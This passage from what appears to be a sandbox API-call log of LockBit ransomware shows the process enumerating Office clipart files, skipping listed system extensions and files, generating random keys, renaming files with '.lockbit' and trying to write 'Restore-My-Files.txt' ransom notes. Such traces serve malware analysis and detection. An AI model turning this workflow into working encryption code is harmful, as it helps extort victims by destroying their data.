files\\microsoft office\\clipart\\pub60cor\\na02124_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0163.671] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0163.671] malloc (_Size=0x40068) returned 0x3d70450 [0163.671] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=8168) returned 1 [0163.671] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.672] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.672] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0163.672] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.673] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.673] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0163.673] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0163.677] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02124_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02124_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.677] malloc (_Size=0xa6) returned 0x1fa2ed8 [0163.677] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0163.678] free (_Block=0x1fa2ed8) [0163.678] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02124_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0163.678] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0163.678] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0163.679] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50f8b800, ftCreationTime.dwHighDateTime=0x1bd4bd0, ftLastAccessTime.dwLowDateTime=0x5951e930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50f8b800, ftLastWriteTime.dwHighDateTime=0x1bd4bd0, nFileSizeHigh=0x0, nFileSizeLow=0x4816, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA02125_.WMF", cAlternateFileName="")) returned 1 [0163.679] lstrcmpiW (lpString1=".", lpString2="NA02125_.WMF") returned -1 [0163.679] lstrcmpiW (lpString1="..", lpString2="NA02125_.WMF") returned -1 [0163.679] PathFindExtensionW (pszPath="NA02125_.WMF") returned=".WMF" [0163.679] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0163.679] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0163.679] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0163.679] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0163.679] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0163.679] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0163.679] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0163.679] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0163.679] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0163.679] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0163.679] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0163.679] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0163.679] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0163.679] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0163.679] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0163.679] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0163.679] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0163.679] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0163.680] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0163.680] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0163.680] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0163.680] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0163.680] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0163.680] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0163.680] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0163.680] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0163.680] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0163.680] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0163.680] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0163.680] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0163.680] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0163.680] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0163.680] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0163.680] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0163.680] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0163.680] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0163.680] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0163.680] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0163.680] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0163.680] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0163.680] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0163.680] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0163.681] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0163.681] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0163.681] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0163.681] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0163.681] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0163.681] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA02125_.WMF") returned 1 [0163.681] lstrcmpiW (lpString1="ntldr", lpString2="NA02125_.WMF") returned 1 [0163.681] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA02125_.WMF") returned 1 [0163.681] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA02125_.WMF") returned -1 [0163.681] lstrcmpiW (lpString1="autorun.inf", lpString2="NA02125_.WMF") returned -1 [0163.681] lstrcmpiW (lpString1="thumbs.db", lpString2="NA02125_.WMF") returned 1 [0163.681] lstrcmpiW (lpString1="iconcache.db", lpString2="NA02125_.WMF") returned -1 [0163.681] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0163.681] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02125_.WMF") returned=".WMF" [0163.681] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0163.681] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0163.681] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0163.681] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0163.681] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0163.681] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0163.681] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0163.681] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0163.682] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0163.682] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0163.682] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0163.682] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0163.682] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0163.682] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0163.682] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0163.682] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0163.682] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0163.682] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0163.682] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0163.682] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0163.682] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0163.682] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0163.682] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0163.682] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0163.682] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0163.682] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0163.682] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0163.682] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0163.682] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02125_.WMF.lockbit") returned 72 [0163.682] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02125_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02125_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0163.687] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0163.687] malloc (_Size=0x40068) returned 0x3df0008 [0163.687] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=18454) returned 1 [0163.687] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.688] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.688] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0163.688] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.688] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.688] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0163.688] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0163.690] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02125_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02125_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.690] malloc (_Size=0xa6) returned 0x1fa2ed8 [0163.690] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0163.692] free (_Block=0x1fa2ed8) [0163.692] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02125_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0163.692] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0163.692] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0163.692] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x819c1a00, ftCreationTime.dwHighDateTime=0x1bd4bef, ftLastAccessTime.dwLowDateTime=0x5951e930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x819c1a00, ftLastWriteTime.dwHighDateTime=0x1bd4bef, nFileSizeHigh=0x0, nFileSizeLow=0x7c50, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA02126_.WMF", cAlternateFileName="")) returned 1 [0163.692] lstrcmpiW (lpString1=".", lpString2="NA02126_.WMF") returned -1 [0163.692] lstrcmpiW (lpString1="..", lpString2="NA02126_.WMF") returned -1 [0163.692] PathFindExtensionW (pszPath="NA02126_.WMF") returned=".WMF" [0163.692] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0163.693] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0163.693] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0163.693] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0163.693] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0163.693] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0163.693] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0163.693] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0163.693] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0163.693] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0163.693] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0163.693] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0163.693] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0163.693] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0163.693] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0163.693] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0163.693] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0163.693] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0163.693] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0163.693] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0163.693] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0163.693] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0163.693] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0163.693] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0163.694] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0163.694] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0163.694] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0163.694] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0163.694] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0163.694] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0163.694] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0163.694] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0163.694] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0163.694] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0163.694] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0163.694] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0163.694] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0163.694] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0163.694] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0163.694] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0163.694] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0163.694] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0163.694] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0163.694] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0163.694] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0163.694] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0163.694] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0163.695] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA02126_.WMF") returned 1 [0163.695] lstrcmpiW (lpString1="ntldr", lpString2="NA02126_.WMF") returned 1 [0163.695] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA02126_.WMF") returned 1 [0163.695] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA02126_.WMF") returned -1 [0163.695] lstrcmpiW (lpString1="autorun.inf", lpString2="NA02126_.WMF") returned -1 [0163.695] lstrcmpiW (lpString1="thumbs.db", lpString2="NA02126_.WMF") returned 1 [0163.695] lstrcmpiW (lpString1="iconcache.db", lpString2="NA02126_.WMF") returned -1 [0163.695] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0163.695] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02126_.WMF") returned=".WMF" [0163.695] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0163.695] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0163.695] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0163.695] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0163.695] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0163.695] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0163.695] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0163.695] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0163.695] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0163.695] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0163.695] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0163.695] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0163.695] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0163.696] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0163.696] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0163.696] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0163.696] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0163.696] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0163.696] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0163.696] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0163.696] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0163.696] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0163.696] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0163.696] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0163.696] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0163.696] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0163.696] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0163.696] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0163.696] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02126_.WMF.lockbit") returned 72 [0163.696] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02126_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02126_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0163.697] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0163.697] malloc (_Size=0x40068) returned 0x1ff1e60 [0163.698] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=31824) returned 1 [0163.698] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.698] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.698] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0163.698] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.699] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.699] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0163.699] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0163.703] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02126_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02126_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.703] malloc (_Size=0xa6) returned 0x1fa2ed8 [0163.704] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0163.705] free (_Block=0x1fa2ed8) [0163.705] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02126_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0163.705] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0163.705] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0163.705] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9355900, ftCreationTime.dwHighDateTime=0x1bd4bef, ftLastAccessTime.dwLowDateTime=0x6a396cf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9355900, ftLastWriteTime.dwHighDateTime=0x1bd4bef, nFileSizeHigh=0x0, nFileSizeLow=0xfe4, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA02127_.WMF", cAlternateFileName="")) returned 1 [0163.705] lstrcmpiW (lpString1=".", lpString2="NA02127_.WMF") returned -1 [0163.705] lstrcmpiW (lpString1="..", lpString2="NA02127_.WMF") returned -1 [0163.705] PathFindExtensionW (pszPath="NA02127_.WMF") returned=".WMF" [0163.705] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0163.705] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0163.705] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0163.705] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0163.705] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0163.705] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0163.705] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0163.706] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0163.706] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0163.706] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0163.706] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0163.706] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0163.706] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0163.706] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0163.706] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0163.706] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0163.706] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0163.706] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0163.706] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0163.706] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0163.706] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0163.706] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0163.706] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0163.706] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0163.706] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0163.706] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0163.706] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0163.706] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0163.707] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0163.707] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0163.707] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0163.707] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0163.707] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0163.707] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0163.707] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0163.707] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0163.707] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0163.707] lstrcmpiW 